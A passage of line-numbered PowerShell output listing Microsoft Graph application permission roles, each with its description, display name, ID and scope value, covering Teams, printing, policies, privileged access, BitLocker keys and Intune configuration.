 201 | Description        : Allows a Teams app to read, install, upgrade, and uninstall itself in any team, without a signed-in user.
 202 | DisplayName        : Allow the Teams app to manage itself for all teams
 203 | Id                 : 9f67436c-5415-4e7f-8ac1-3014a7132630
 204 | IsEnabled          : True
 205 | Value              : TeamsAppInstallation.ReadWriteSelfForTeam.All
 206 | 
 207 | AllowedMemberTypes : {Application}
 208 | Description        : Allows a Teams app to read, install, upgrade, and uninstall itself for any chat, without a signed-in user.
 209 | DisplayName        : Allow the Teams app to manage itself for all chats
 210 | Id                 : 73a45059-f39c-4baf-9182-4954ac0e55cf
 211 | IsEnabled          : True
 212 | Value              : TeamsAppInstallation.ReadWriteSelfForChat.All
 213 | 
 214 | AllowedMemberTypes : {Application}
 215 | Description        : Allows the app to read, install, upgrade, and uninstall Teams apps for any user, without a signed-in user. Does not give the 
 216 |                      ability to read application-specific settings.
 217 | DisplayName        : Manage Teams apps for all users
 218 | Id                 : 74ef0291-ca83-4d02-8c7e-d2391e6a444f
 219 | IsEnabled          : True
 220 | Value              : TeamsAppInstallation.ReadWriteForUser.All
 221 | 
 222 | AllowedMemberTypes : {Application}
 223 | Description        : Allows the app to read, install, upgrade, and uninstall Teams apps in any team, without a signed-in user. Does not give the 
 224 |                      ability to read application-specific settings.
 225 | DisplayName        : Manage Teams apps for all teams
 226 | Id                 : 5dad17ba-f6cc-4954-a5a2-a0dcc95154f0
 227 | IsEnabled          : True
 228 | Value              : TeamsAppInstallation.ReadWriteForTeam.All
 229 | 
 230 | AllowedMemberTypes : {Application}
 231 | Description        : Allows the app to read, install, upgrade, and uninstall Teams apps in any chat, without a signed-in user. Does not give the 
 232 |                      ability to read application-specific settings.
 233 | DisplayName        : Manage Teams apps for all chats
 234 | Id                 : 9e19bae1-2623-4c4f-ab6e-2664615ff9a0
 235 | IsEnabled          : True
 236 | Value              : TeamsAppInstallation.ReadWriteForChat.All
 237 | 
 238 | AllowedMemberTypes : {Application}
 239 | Description        : Allows the app to read the Teams apps that are installed for any user, without a signed-in user. Does not give the ability to 
 240 |                      read application-specific settings.
 241 | DisplayName        : Read installed Teams apps for all users
 242 | Id                 : 9ce09611-f4f7-4abd-a629-a05450422a97
 243 | IsEnabled          : True
 244 | Value              : TeamsAppInstallation.ReadForUser.All
 245 | 
 246 | AllowedMemberTypes : {Application}
 247 | Description        : Allows the app to read the Teams apps that are installed in any team, without a signed-in user. Does not give the ability to read 
 248 |                      application-specific settings.
 249 | DisplayName        : Read installed Teams apps for all teams
 250 | Id                 : 1f615aea-6bf9-4b05-84bd-46388e138537
 251 | IsEnabled          : True
 252 | Value              : TeamsAppInstallation.ReadForTeam.All
 253 | 
 254 | AllowedMemberTypes : {Application}
 255 | Description        : Allows the app to read the Teams apps that are installed in any chat, without a signed-in user. Does not give the ability to read 
 256 |                      application-specific settings.
 257 | DisplayName        : Read installed Teams apps for all chats
 258 | Id                 : cc7e7635-2586-41d6-adaa-a8d3bcad5ee5
 259 | IsEnabled          : True
 260 | Value              : TeamsAppInstallation.ReadForChat.All
 261 | 
 262 | AllowedMemberTypes : {Application}
 263 | Description        : Allows the app to create chat and channel messages, without a signed in user. The app specifies which user appears as the sender, 
 264 |                      and can backdate the message to appear as if it was sent long ago. The messages can be sent to any chat or channel in the 
 265 |                      organization.
 266 | DisplayName        : Create chat and channel messages with anyone's identity and with any timestamp
 267 | Id                 : dfb0dd15-61de-45b2-be36-d6a69fba3c79
 268 | IsEnabled          : True
 269 | Value              : Teamwork.Migrate.All
 270 | 
 271 | AllowedMemberTypes : {Application}
 272 | Description        : Allows the application to read and update print task definitions without a signed-in user. 
 273 | DisplayName        : Read, write and update print task definitions
 274 | Id                 : 456b71a7-0ee0-4588-9842-c123fcc8f664
 275 | IsEnabled          : True
 276 | Value              : PrintTaskDefinition.ReadWrite.All
 277 | 
 278 | AllowedMemberTypes : {Application}
 279 | Description        : Allows the application to read and update the metadata of print jobs without a signed-in user.Does not allow access to print job 
 280 |                      document content.
 281 | DisplayName        : Read and write basic information for print jobs
 282 | Id                 : 57878358-37f4-4d3a-8c20-4816e0d457b1
 283 | IsEnabled          : True
 284 | Value              : PrintJob.ReadWriteBasic.All
 285 | 
 286 | AllowedMemberTypes : {Application}
 287 | Description        : Allows the application to read and update the metadata and document content of print jobs without a signed-in user.
 288 | DisplayName        : Read and write print jobs
 289 | Id                 : 5114b07b-2898-4de7-a541-53b0004e2e13
 290 | IsEnabled          : True
 291 | Value              : PrintJob.ReadWrite.All
 292 | 
 293 | AllowedMemberTypes : {Application}
 294 | Description        : Allows the application to read the metadata of print jobs without a signed-in user.Does not allow access to print job document 
 295 |                      content.
 296 | DisplayName        : Read basic information for print jobs
 297 | Id                 : fbf67eee-e074-4ef7-b965-ab5ce1c1f689
 298 | IsEnabled          : True
 299 | Value              : PrintJob.ReadBasic.All
 300 | 
 301 | AllowedMemberTypes : {Application}
 302 | Description        : Allows the application to read the metadata and document content of print jobs without a signed-in user. 
 303 | DisplayName        : Read print jobs
 304 | Id                 : ac6f956c-edea-44e4-bd06-64b1b4b9aec9
 305 | IsEnabled          : True
 306 | Value              : PrintJob.Read.All
 307 | 
 308 | AllowedMemberTypes : {Application}
 309 | Description        : Allows the application to perform advanced operations like redirecting a print job to another printer without a signed-in user. 
 310 |                      Also allows the application to read and update the metadata of print jobs.
 311 | DisplayName        : Perform advanced operations on print jobs
 312 | Id                 : 58a52f47-9e36-4b17-9ebe-ce4ef7f3e6c8
 313 | IsEnabled          : True
 314 | Value              : PrintJob.Manage.All
 315 | 
 316 | AllowedMemberTypes : {Application}
 317 | Description        : Allows the application to read and update printers without a signed-in user. Does not allow creating (registering) or deleting 
 318 |                      (unregistering) printers.
 319 | DisplayName        : Read and update printers
 320 | Id                 : f5b3f73d-6247-44df-a74c-866173fddab0
 321 | IsEnabled          : True
 322 | Value              : Printer.ReadWrite.All
 323 | 
 324 | AllowedMemberTypes : {Application}
 325 | Description        : Allows the application to read printers without a signed-in user. 
 326 | DisplayName        : Read printers
 327 | Id                 : 9709bb33-4549-49d4-8ed9-a8f65e45bb0f
 328 | IsEnabled          : True
 329 | Value              : Printer.Read.All
 330 | 
 331 | AllowedMemberTypes : {Application}
 332 | Description        : Allows the app to manage policies related to consent and permission grants for applications, without a signed-in user.
 333 | DisplayName        : Manage consent and permission grant policies
 334 | Id                 : a402ca1c-2696-4531-972d-6e5ee4aa11ea
 335 | IsEnabled          : True
 336 | Value              : Policy.ReadWrite.PermissionGrant
 337 | 
 338 | AllowedMemberTypes : {Application}
 339 | Description        : Allows the app to read policies related to consent and permission grants for applications, without a signed-in user.
 340 | DisplayName        : Read consent and permission grant policies
 341 | Id                 : 9e640839-a198-48fb-8b9a-013fd6f6cbcd
 342 | IsEnabled          : True
 343 | Value              : Policy.Read.PermissionGrant
 344 | 
 345 | AllowedMemberTypes : {Application}
 346 | Description        : Read names and members of all one-to-one and group chats in Microsoft Teams, without a signed-in user.
 347 | DisplayName        : Read names and members of all chat threads
 348 | Id                 : b2e060da-3baf-4687-9611-f4ebc0f0cbde
 349 | IsEnabled          : True
 350 | Value              : Chat.ReadBasic.All
 351 | 
 352 | AllowedMemberTypes : {Application}
 353 | Description        : Allows the app to read and write your organization's authorization policy without a signed in user. For example, authorization 
 354 |                      policies can control some of the permissions that the out-of-the-box user role has by default.
 355 | DisplayName        : Read and write your organization's authorization policy
 356 | Id                 : fb221be6-99f2-473f-bd32-01c6a0e9ca3b
 357 | IsEnabled          : True
 358 | Value              : Policy.ReadWrite.Authorization
 359 | 
 360 | AllowedMemberTypes : {Application}
 361 | Description        : Allows the app to read and write all authentication method policies for the tenant, without a signed-in user. 
 362 | DisplayName        : Read and write all authentication method policies 
 363 | Id                 : 29c18626-4985-4dcd-85c0-193eef327366
 364 | IsEnabled          : True
 365 | Value              : Policy.ReadWrite.AuthenticationMethod
 366 | 
 367 | AllowedMemberTypes : {Application}
 368 | Description        : Allows the app to read and write all authentication flow policies for the tenant, without a signed-in user.
 369 | DisplayName        : Read and write authentication flow policies
 370 | Id                 : 25f85f3c-f66c-4205-8cd5-de92dd7f0cec
 371 | IsEnabled          : True
 372 | Value              : Policy.ReadWrite.AuthenticationFlows
 373 | 
 374 | AllowedMemberTypes : {Application}
 375 | Description        : Add and remove members from all channels, without a signed-in user. Also allows changing a member's role, for example from owner 
 376 |                      to non-owner.
 377 | DisplayName        : Add and remove members from all channels
 378 | Id                 : 35930dcf-aceb-4bd1-b99a-8ffed403c974
 379 | IsEnabled          : True
 380 | Value              : ChannelMember.ReadWrite.All
 381 | 
 382 | AllowedMemberTypes : {Application}
 383 | Description        : Read the members of all channels, without a signed-in user.
 384 | DisplayName        : Read the members of all channels
 385 | Id                 : 3b55498e-47ec-484f-8136-9013221c06a9
 386 | IsEnabled          : True
 387 | Value              : ChannelMember.Read.All
 388 | 
 389 | AllowedMemberTypes : {Application}
 390 | Description        : Add and remove members from all teams, without a signed-in user. Also allows changing a team member's role, for example from 
 391 |                      owner to non-owner.
 392 | DisplayName        : Add and remove members from all teams
 393 | Id                 : 0121dc95-1b9f-4aed-8bac-58c5ac466691
 394 | IsEnabled          : True
 395 | Value              : TeamMember.ReadWrite.All
 396 | 
 397 | AllowedMemberTypes : {Application}
 398 | Description        : Read the members of all teams, without a signed-in user.
 399 | DisplayName        : Read the members of all teams
 400 | Id                 : 660b7406-55f1-41ca-a0ed-0b035e182f3e
 401 | IsEnabled          : True
 402 | Value              : TeamMember.Read.All
 403 | 
 404 | AllowedMemberTypes : {Application}
 405 | Description        : Read all team's settings, without a signed-in user.
 406 | DisplayName        : Read all teams' settings
 407 | Id                 : 242607bd-1d2c-432c-82eb-bdb27baa23ab
 408 | IsEnabled          : True
 409 | Value              : TeamSettings.Read.All
 410 | 
 411 | AllowedMemberTypes : {Application}
 412 | Description        : Read and change all teams' settings, without a signed-in user.
 413 | DisplayName        : Read and change all teams' settings
 414 | Id                 : bdd80a03-d9bc-451d-b7c4-ce7c63fe3c8f
 415 | IsEnabled          : True
 416 | Value              : TeamSettings.ReadWrite.All
 417 | 
 418 | AllowedMemberTypes : {Application}
 419 | Description        : Read all channel names and channel descriptions, without a signed-in user.
 420 | DisplayName        : Read the names and descriptions  of all channels
 421 | Id                 : 59a6b24b-4225-4393-8165-ebaec5f55d7a
 422 | IsEnabled          : True
 423 | Value              : Channel.ReadBasic.All
 424 | 
 425 | AllowedMemberTypes : {Application}
 426 | Description        : Get a list of all teams, without a signed-in user.
 427 | DisplayName        : Get a list of all teams
 428 | Id                 : 2280dda6-0bfd-44ee-a2f4-cb867cfc4c1e
 429 | IsEnabled          : True
 430 | Value              : Team.ReadBasic.All
 431 | 
 432 | AllowedMemberTypes : {Application}
 433 | Description        : Read and write the names, descriptions, and settings of all channels, without a signed-in user.
 434 | DisplayName        : Read and write the names, descriptions, and settings of all channels
 435 | Id                 : 243cded2-bd16-4fd6-a953-ff8177894c3d
 436 | IsEnabled          : True
 437 | Value              : ChannelSettings.ReadWrite.All
 438 | 
 439 | AllowedMemberTypes : {Application}
 440 | Description        : Read all channel names, channel descriptions, and channel settings, without a signed-in user.
 441 | DisplayName        : Read the names, descriptions, and settings of all channels
 442 | Id                 : c97b873f-f59f-49aa-8a0e-52b32d762124
 443 | IsEnabled          : True
 444 | Value              : ChannelSettings.Read.All
 445 | 
 446 | AllowedMemberTypes : {Application}
 447 | Description        : Delete channels in any team, without a signed-in user.
 448 | DisplayName        : Delete channels
 449 | Id                 : 6a118a39-1227-45d4-af0c-ea7b40d210bc
 450 | IsEnabled          : True
 451 | Value              : Channel.Delete.All
 452 | 
 453 | AllowedMemberTypes : {Application}
 454 | Description        : Create channels in any team, without a signed-in user.
 455 | DisplayName        : Create channels
 456 | Id                 : f3a65bd4-b703-46df-8f7e-0174fea562aa
 457 | IsEnabled          : True
 458 | Value              : Channel.Create
 459 | 
 460 | AllowedMemberTypes : {Application}
 461 | Description        : Allows the app to read and write access packages and related entitlement management resources without a signed-in user.
 462 | DisplayName        : Read and write all entitlement management resources
 463 | Id                 : 9acd699f-1e81-4958-b001-93b1d2506e19
 464 | IsEnabled          : True
 465 | Value              : EntitlementManagement.ReadWrite.All
 466 | 
 467 | AllowedMemberTypes : {Application}
 468 | Description        : Allows the app to read access packages and related entitlement management resources without a signed-in user.
 469 | DisplayName        : Read all entitlement management resources
 470 | Id                 : c74fd47d-ed3c-45c3-9a9e-b8676de685d2
 471 | IsEnabled          : True
 472 | Value              : EntitlementManagement.Read.All
 473 | 
 474 | AllowedMemberTypes : {Application}
 475 | Description        : Allows the app to create or delete document libraries and lists in all site collections without a signed in user.
 476 | DisplayName        : Create, edit, and delete items and lists in all site collections
 477 | Id                 : 0c0bf378-bf22-4481-8f81-9e89a9b4960a
 478 | IsEnabled          : True
 479 | Value              : Sites.Manage.All
 480 | 
 481 | AllowedMemberTypes : {Application}
 482 | Description        : Allows the app to have full control of all site collections without a signed in user.
 483 | DisplayName        : Have full control of all site collections
 484 | Id                 : a82116e5-55eb-4c41-a434-62fe8a61c773
 485 | IsEnabled          : True
 486 | Value              : Sites.FullControl.All
 487 | 
 488 | AllowedMemberTypes : {Application}
 489 | Description        : Allows the app to read all the OneNote notebooks in your organization, without a signed-in user.
 490 | DisplayName        : Read and write all OneNote notebooks
 491 | Id                 : 0c458cef-11f3-48c2-a568-c66751c238c0
 492 | IsEnabled          : True
 493 | Value              : Notes.ReadWrite.All
 494 | 
 495 | AllowedMemberTypes : {Application}
 496 | Description        : Allows the app to manage all users' shift schedule preferences without a signed-in user.
 497 | DisplayName        : Read and write all user shift preferences
 498 | Id                 : d1eec298-80f3-49b0-9efb-d90e224798ac
 499 | IsEnabled          : True
 500 | Value              : UserShiftPreferences.ReadWrite.All
 501 | 
 502 | AllowedMemberTypes : {Application}
 503 | Description        : Allows the app to read all users' shift schedule preferences without a signed-in user.
 504 | DisplayName        : Read all user shift preferences
 505 | Id                 : de023814-96df-4f53-9376-1e2891ef5a18
 506 | IsEnabled          : True
 507 | Value              : UserShiftPreferences.Read.All
 508 | 
 509 | AllowedMemberTypes : {Application}
 510 | Description        : Allows the app to read, update and delete identities that are associated with a user's account, without a signed in user. This 
 511 |                      controls the identities users can sign-in with.
 512 | DisplayName        : Manage all users' identities
 513 | Id                 : c529cfca-c91b-489c-af2b-d92990b66ce6
 514 | IsEnabled          : True
 515 | Value              : User.ManageIdentities.All
 516 | 
 517 | AllowedMemberTypes : {Application}
 518 | Description        : Allows the app to read your organization's devices' configuration information without a signed-in user.
 519 | DisplayName        : Read all devices
 520 | Id                 : 7438b122-aefc-4978-80ed-43db9fcc7715
 521 | IsEnabled          : True
 522 | Value              : Device.Read.All
 523 | 
 524 | AllowedMemberTypes : {Application}
 525 | Description        : Allows the app to read and write your organization's application configuration policies, without a signed-in user.  This includes 
 526 |                      policies such as activityBasedTimeoutPolicy, claimsMappingPolicy, homeRealmDiscoveryPolicy, tokenIssuancePolicy  and 
 527 |                      tokenLifetimePolicy.
 528 | DisplayName        : Read and write your organization's application configuration policies
 529 | Id                 : be74164b-cff1-491c-8741-e671cb536e13
 530 | IsEnabled          : True
 531 | Value              : Policy.ReadWrite.ApplicationConfiguration
 532 | 
 533 | AllowedMemberTypes : {Application}
 534 | Description        : Allows the app to read all domain properties without a signed-in user.
 535 | DisplayName        : Read domains
 536 | Id                 : dbb9058a-0e50-45d7-ae91-66909b5d4664
 537 | IsEnabled          : True
 538 | Value              : Domain.Read.All
 539 | 
 540 | AllowedMemberTypes : {Application}
 541 | Description        : Read and write tabs in any team in Microsoft Teams, without a signed-in user. This does not give access to the content inside the 
 542 |                      tabs.
 543 | DisplayName        : Read and write tabs in Microsoft Teams.
 544 | Id                 : a96d855f-016b-47d7-b51c-1218a98d791c
 545 | IsEnabled          : True
 546 | Value              : TeamsTab.ReadWrite.All
 547 | 
 548 | AllowedMemberTypes : {Application}
 549 | Description        : Read the names and settings of tabs inside any team in Microsoft Teams, without a signed-in user. This does not give access to 
 550 |                      the content inside the tabs. 
 551 | DisplayName        : Read tabs in Microsoft Teams.
 552 | Id                 : 46890524-499a-4bb2-ad64-1476b4f3e1cf
 553 | IsEnabled          : True
 554 | Value              : TeamsTab.Read.All
 555 | 
 556 | AllowedMemberTypes : {Application}
 557 | Description        : Allows the app to create tabs in any team in Microsoft Teams, without a signed-in user. This does not grant the ability to read, 
 558 |                      modify or delete tabs after they are created, or give access to the content inside the tabs.
 559 | DisplayName        : Create tabs in Microsoft Teams.
 560 | Id                 : 49981c42-fd7b-4530-be03-e77b21aed25e
 561 | IsEnabled          : True
 562 | Value              : TeamsTab.Create
 563 | 
 564 | AllowedMemberTypes : {Application}
 565 | Description        :  Allows the app to read authentication methods of all users in your organization, without a signed-in user.                       
 566 |                      Authentication methods include things like a user’s phone numbers and Authenticator app settings. This does not allow the         
 567 |                                   app to see secret information like passwords, or to sign-in or otherwise use the authentication methods.
 568 | DisplayName        :  Read all users' authentication methods
 569 | Id                 : 38d9df27-64da-44fd-b7c5-a6fbac20248f
 570 | IsEnabled          : True
 571 | Value              : UserAuthenticationMethod.Read.All
 572 | 
 573 | AllowedMemberTypes : {Application}
 574 | Description        : Allows the application to read and write authentication methods of all users in your organization, without a signed-in user.      
 575 |                                       Authentication methods include things like a user’s phone numbers and Authenticator app settings. This           
 576 |                                 does not allow the app to see secret information like passwords, or to sign-in or otherwise use the authentication 
 577 |                      methods
 578 | DisplayName        : Read and write all users' authentication methods 
 579 | Id                 : 50483e42-d915-4231-9639-7fdb7fd190e5
 580 | IsEnabled          : True
 581 | Value              : UserAuthenticationMethod.ReadWrite.All
 582 | 
 583 | AllowedMemberTypes : {Application}
 584 | Description        : Allows the app to read and write your organization's conditional access policies, without a signed-in user.
 585 | DisplayName        : Read and write your organization's conditional access policies
 586 | Id                 : 01c0a623-fc9b-48e9-b794-0756f8e8f067
 587 | IsEnabled          : True
 588 | Value              : Policy.ReadWrite.ConditionalAccess
 589 | 
 590 | AllowedMemberTypes : {Application}
 591 | Description        : Allows the app to read call records for all calls and online meetings without a signed-in user.
 592 | DisplayName        : Read all call records
 593 | Id                 : 45bbb07e-7321-4fd7-a8f6-3ff27e6a81c8
 594 | IsEnabled          : True
 595 | Value              : CallRecords.Read.All
 596 | 
 597 | AllowedMemberTypes : {Application}
 598 | Description        : Allows the app to manage all schedules, schedule groups, shifts and associated entities in the Teams or Shifts application 
 599 |                      without a signed-in user.
 600 | DisplayName        : Read and write all schedule items
 601 | Id                 : b7760610-0545-4e8a-9ec3-cce9e63db01c
 602 | IsEnabled          : True
 603 | Value              : Schedule.ReadWrite.All
 604 | 
 605 | AllowedMemberTypes : {Application}
 606 | Description        : Allows the app to read all schedules, schedule groups, shifts and associated entities in the Teams or Shifts application without 
 607 |                      a signed-in user.
 608 | DisplayName        : Read all schedule items
 609 | Id                 : 7b2ebf90-d836-437f-b90d-7b62722c4456
 610 | IsEnabled          : True
 611 | Value              : Schedule.Read.All
 612 | 
 613 | AllowedMemberTypes : {Application}
 614 | Description        : Allows an app to read your organization's threat assessment requests, without a signed-in user.
 615 | DisplayName        : Read threat assessment requests
 616 | Id                 : f8f035bb-2cce-47fb-8bf5-7baf3ecbee48
 617 | IsEnabled          : True
 618 | Value              : ThreatAssessment.Read.All
 619 | 
 620 | AllowedMemberTypes : {Application}
 621 | Description        : Allows the app to create groups without a signed-in user.
 622 | DisplayName        : Create groups
 623 | Id                 : bf7b1a76-6e77-406b-b258-bf5c7720e98f
 624 | IsEnabled          : True
 625 | Value              : Group.Create
 626 | 
 627 | AllowedMemberTypes : {Application}
 628 | Description        : Allows the app to list groups, read basic properties, read and update the membership of the groups this app has access to without 
 629 |                      a signed-in user. Group properties and owners cannot be updated and groups cannot be deleted.
 630 | DisplayName        : Read and write all group memberships
 631 | Id                 : dbaae8cf-10b5-4b86-a4a1-f871c94c6695
 632 | IsEnabled          : True
 633 | Value              : GroupMember.ReadWrite.All
 634 | 
 635 | AllowedMemberTypes : {Application}
 636 | Description        : Allows the app to read memberships and basic group properties for all groups without a signed-in user.
 637 | DisplayName        : Read all group memberships
 638 | Id                 : 98830695-27a2-44f7-8c18-0c3ebc9698f6
 639 | IsEnabled          : True
 640 | Value              : GroupMember.Read.All
 641 | 
 642 | AllowedMemberTypes : {Application}
 643 | Description        : Allows an app to read basic BitLocker key properties for all devices, without a signed-in user. Does not allow read of the 
 644 |                      recovery key.
 645 | DisplayName        : Read all BitLocker keys basic information
 646 | Id                 : f690d423-6b29-4d04-98c6-694c42282419
 647 | IsEnabled          : True
 648 | Value              : BitlockerKey.ReadBasic.All
 649 | 
 650 | AllowedMemberTypes : {Application}
 651 | Description        : Allows an app to read BitLocker keys for all devices, without a signed-in user. Allows read of the recovery key.
 652 | DisplayName        : Read all BitLocker keys
 653 | Id                 : 57f1cf28-c0c4-4ec3-9a30-19a2eaaf2f6e
 654 | IsEnabled          : True
 655 | Value              : BitlockerKey.Read.All
 656 | 
 657 | AllowedMemberTypes : {Application}
 658 | Description        : Allows the app to read all applications and service principals without a signed-in user.
 659 | DisplayName        : Read all applications
 660 | Id                 : 9a5d68dd-52b0-4cc2-bd40-abcf44ac3a30
 661 | IsEnabled          : True
 662 | Value              : Application.Read.All
 663 | 
 664 | AllowedMemberTypes : {Application}
 665 | Description        : Allows the app to send, read, update and delete user’s notifications, without a signed-in user.
 666 | DisplayName        : Deliver and manage all user's notifications
 667 | Id                 : 4e774092-a092-48d1-90bd-baad67c7eb47
 668 | IsEnabled          : True
 669 | Value              : UserNotification.ReadWrite.CreatedByApp
 670 | 
 671 | AllowedMemberTypes : {Application}
 672 | Description        : Allows the app to read, install, upgrade, and uninstall Teams apps for any user, without a signed-in user. Does not give the 
 673 |                      ability to read or write application-specific settings.
 674 | DisplayName        : Manage all users' Teams apps
 675 | Id                 : eb6b3d76-ed75-4be6-ac36-158d04c0a555
 676 | IsEnabled          : True
 677 | Value              : TeamsApp.ReadWrite.All
 678 | 
 679 | AllowedMemberTypes : {Application}
 680 | Description        : Allows the app to read the Teams apps that are installed for any user, without a signed-in user. Does not give the ability to 
 681 |                      read application-specific settings.
 682 | DisplayName        : Read all users' installed Teams apps
 683 | Id                 : afdb422a-4b2a-4e07-a708-8ceed48196bf
 684 | IsEnabled          : True
 685 | Value              : TeamsApp.Read.All
 686 | 
 687 | AllowedMemberTypes : {Application}
 688 | Description        : Allows the app to read and write customer lockbox requests, business flows, and governance policy templates without a signed-in 
 689 |                      user.
 690 | DisplayName        : Read and write all customer lockbox approval requests
 691 | Id                 : 5f411d27-abad-4dc3-83c6-b84a46ffa434
 692 | IsEnabled          : True
 693 | Value              : ApprovalRequest.ReadWrite.CustomerLockbox
 694 | 
 695 | AllowedMemberTypes : {Application}
 696 | Description        : Allows the app to read and write admin consent requests, business flows, and governance policy templates without a signed-in user.
 697 | DisplayName        : Read and write all admin consent approval requests
 698 | Id                 : afe5c674-a576-4b80-818c-e3d7f6afd299
 699 | IsEnabled          : True
 700 | Value              : ApprovalRequest.ReadWrite.AdminConsentRequest
 701 | 
 702 | AllowedMemberTypes : {Application}
 703 | Description        : Allows the app to read and write entitlement management requests, business flows, and governance policy templates without a 
 704 |                      signed-in user.
 705 | DisplayName        : Read and write all entitlement management approval requests
 706 | Id                 : fbfdecc9-4b78-4882-bb98-7decbddcbddf
 707 | IsEnabled          : True
 708 | Value              : ApprovalRequest.ReadWrite.EntitlementManagement
 709 | 
 710 | AllowedMemberTypes : {Application}
 711 | Description        : Allows the app to read and write privileged access requests, business flows, and governance policy templates without a signed-in 
 712 |                      user.
 713 | DisplayName        : Read and write all privileged access approval requests
 714 | Id                 : 60182ac6-4565-4baa-8b04-9350fe8dbfca
 715 | IsEnabled          : True
 716 | Value              : ApprovalRequest.ReadWrite.PriviligedAccess
 717 | 
 718 | AllowedMemberTypes : {Application}
 719 | Description        : Allows the app to read customer lockbox requests, business flows, and governance policy templates without a signed-in user.
 720 | DisplayName        : Read all customer lockbox approval requests
 721 | Id                 : 080ce695-a830-4d5c-a45a-375e3ab11b11
 722 | IsEnabled          : True
 723 | Value              : ApprovalRequest.Read.CustomerLockbox
 724 | 
 725 | AllowedMemberTypes : {Application}
 726 | Description        : Allows the app to read admin consent requests, business flows, and governance policy templates without a signed-in user.
 727 | DisplayName        : Read all admin consent approval requests
 728 | Id                 : 0d9d2e88-e2eb-4ac7-9b1d-9b68ed9f9f4f
 729 | IsEnabled          : True
 730 | Value              : ApprovalRequest.Read.AdminConsentRequest
 731 | 
 732 | AllowedMemberTypes : {Application}
 733 | Description        : Allows the app to read entitlement management requests, business flows, and governance policy templates without a signed-in user.
 734 | DisplayName        : Read all entitlement management approval requests
 735 | Id                 : b2a3adf0-5774-4846-986c-a91c705b0141
 736 | IsEnabled          : True
 737 | Value              : ApprovalRequest.Read.EntitlementManagement
 738 | 
 739 | AllowedMemberTypes : {Application}
 740 | Description        : Allows the app to read privileged access requests, business flows, and governance policy templates without a signed-in user.
 741 | DisplayName        : Read all privileged access approval requests
 742 | Id                 : 3f410ed8-2d83-4435-b2c4-c776f44e4ae1
 743 | IsEnabled          : True
 744 | Value              : ApprovalRequest.Read.PriviligedAccess
 745 | 
 746 | AllowedMemberTypes : {Application}
 747 | Description        : Allows the app to read all the indicators for your organization, without a signed-in user.
 748 | DisplayName        : Read all threat indicators
 749 | Id                 : 197ee4e9-b993-4066-898f-d6aecc55125b
 750 | IsEnabled          : True
 751 | Value              : ThreatIndicators.Read.All
 752 | 
 753 | AllowedMemberTypes : {Application}
 754 | Description        : Allows the app to request and manage time-based assignment and just-in-time elevation of Azure resources (like your 
 755 |                      subscriptions, resource groups, storage, compute) in your organization, without a signed-in user.
 756 | DisplayName        : Read and write privileged access to Azure resources
 757 | Id                 : 6f9d5abc-2db6-400b-a267-7de22a40fb87
 758 | IsEnabled          : True
 759 | Value              : PrivilegedAccess.ReadWrite.AzureResources
 760 | 
 761 | AllowedMemberTypes : {Application}
 762 | Description        : Allows the app to request and manage time-based assignment and just-in-time elevation (including scheduled elevation) of Azure AD 
 763 |                      groups in your organization, without a signed-in user.
 764 | DisplayName        : Read and write privileged access to Azure AD groups
 765 | Id                 : 2f6817f8-7b12-4f0f-bc18-eeaf60705a9e
 766 | IsEnabled          : True
 767 | Value              : PrivilegedAccess.ReadWrite.AzureADGroup
 768 | 
 769 | AllowedMemberTypes : {Application}
 770 | Description        : Allows the app to request and manage time-based assignment and just-in-time elevation (including scheduled elevation) of Azure AD 
 771 |                      built-in and custom administrative roles in your organization, without a signed-in user.
 772 | DisplayName        : Read and write privileged access to Azure AD roles
 773 | Id                 : 854d9ab1-6657-4ec8-be45-823027bcd009
 774 | IsEnabled          : True
 775 | Value              : PrivilegedAccess.ReadWrite.AzureAD
 776 | 
 777 | AllowedMemberTypes : {Application}
 778 | Description        : Allows the app to read time-based assignment and just-in-time elevation of user privileges to audit Azure resources in your 
 779 |                      organization, without a signed-in user.
 780 | DisplayName        : Read privileged access to Azure resources
 781 | Id                 : 5df6fe86-1be0-44eb-b916-7bd443a71236
 782 | IsEnabled          : True
 783 | Value              : PrivilegedAccess.Read.AzureResources
 784 | 
 785 | AllowedMemberTypes : {Application}
 786 | Description        : Allows the app to read time-based assignment and just-in-time elevation (including scheduled elevation) of Azure AD groups in 
 787 |                      your organization, without a signed-in user.
 788 | DisplayName        : Read privileged access to Azure AD groups
 789 | Id                 : 01e37dc9-c035-40bd-b438-b2879c4870a6
 790 | IsEnabled          : True
 791 | Value              : PrivilegedAccess.Read.AzureADGroup
 792 | 
 793 | AllowedMemberTypes : {Application}
 794 | Description        : Allows the app to read time-based assignment and just-in-time elevation (including scheduled elevation) of Azure AD built-in and 
 795 |                      custom administrative roles in your organization, without a signed-in user.
 796 | DisplayName        : Read privileged access to Azure AD roles
 797 | Id                 : 4cdc2547-9148-4295-8d11-be0db1391d6b
 798 | IsEnabled          : True
 799 | Value              : PrivilegedAccess.Read.AzureAD
 800 | 
 801 | AllowedMemberTypes : {Application}
 802 | Description        : Allows the app to send new activities to any users' teamwork activity feed, without a signed-in user.
 803 | DisplayName        : Send a teamwork activity to any user
 804 | Id                 : a267235f-af13-44dc-8385-c1dc93023186
 805 | IsEnabled          : True
 806 | Value              : TeamsActivity.Send
 807 | 
 808 | AllowedMemberTypes : {Application}
 809 | Description        : Allows the app to read all users' teamwork activity feed, without a signed-in user.
 810 | DisplayName        : Read all users' teamwork activity feed
 811 | Id                 : 70dec828-f620-4914-aa83-a29117306807
 812 | IsEnabled          : True
 813 | Value              : TeamsActivity.Read.All
 814 | 
 815 | AllowedMemberTypes : {Application}
 816 | Description        : Allows the app to manage permission grants for delegated permissions exposed by any API (including Microsoft Graph), without a 
 817 |                      signed-in user.
 818 | DisplayName        : Manage all delegated permission grants
 819 | Id                 : 8e8e4742-1d95-4f68-9d56-6ee75648c72a
 820 | IsEnabled          : True
 821 | Value              : DelegatedPermissionGrant.ReadWrite.All
 822 | 
 823 | AllowedMemberTypes : {Application}
 824 | Description        : Allows the app to manage permission grants for application permissions to any API (including Microsoft Graph) and application 
 825 |                      assignments for any app, without a signed-in user.
 826 | DisplayName        : Manage app permission grants and app role assignments
 827 | Id                 : 06b708a9-e830-4db3-a914-8e69da51d44f
 828 | IsEnabled          : True
 829 | Value              : AppRoleAssignment.ReadWrite.All
 830 | 
 831 | AllowedMemberTypes : {Application}
 832 | Description        : Allows the app to read and write Microsoft Intune service properties including device enrollment and third party service 
 833 |                      connection configuration, without a signed-in user.
 834 | DisplayName        : Read and write Microsoft Intune configuration
 835 | Id                 : 5ac13192-7ace-4fcf-b828-1a26f28068ee
 836 | IsEnabled          : True
 837 | Value              : DeviceManagementServiceConfig.ReadWrite.All
 838 | 
 839 | AllowedMemberTypes : {Application}
